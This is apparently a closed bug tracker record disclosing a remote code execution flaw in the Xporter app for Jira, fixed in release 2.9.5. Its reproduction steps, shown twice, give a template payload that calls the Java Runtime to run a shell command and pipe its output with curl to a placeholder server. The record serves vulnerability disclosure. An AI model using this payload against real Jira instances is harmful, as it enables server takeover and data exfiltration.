Details
-
Bug
-
Status: Closed
-
Medium
-
Resolution: Fixed
-
Release 2.9.5
-
Steps to Reproduce:
- Create Jira cloud instance and install the apps.
- Go to Apps > Manage your apps > Xporter Templates.
- Add new template, put any name and upload this .txt file (please update the data payload accordingly): {{%
{ var data = ["/bin/sh", "-c", "ls -la | curl http://server/ --data-binary @-"]; var command = Java.to(data, "java.lang.String[]"); Java.type('java.lang.Runtime').getRuntime().exec(command, null); }
}}
- Go to any Jira issue, click Xporter > Open Xporter. Select the new template, then click Export. The RCE will be triggered.
Steps to Reproduce: Create Jira cloud instance and install the apps. Go to Apps > Manage your apps > Xporter Templates. Add new template, put any name and upload this .txt file (please update the data payload accordingly): {{% { var data = ["/bin/sh", "-c", "ls -la | curl http://server/ --data-binary @-"]; var command = Java.to(data, "java.lang.String[]"); Java.type('java.lang.Runtime').getRuntime().exec(command, null); } }} Go to any Jira issue, click Xporter > Open Xporter. Select the new template, then click Export. The RCE will be triggered.
Description
Xporter for Jira Server is vulnerable to remote code execution by exploiting the export feature.
Attachments
Issue Links
- relates to
-
XPORTER-3775 Update Engine version
-
- Resolved
-
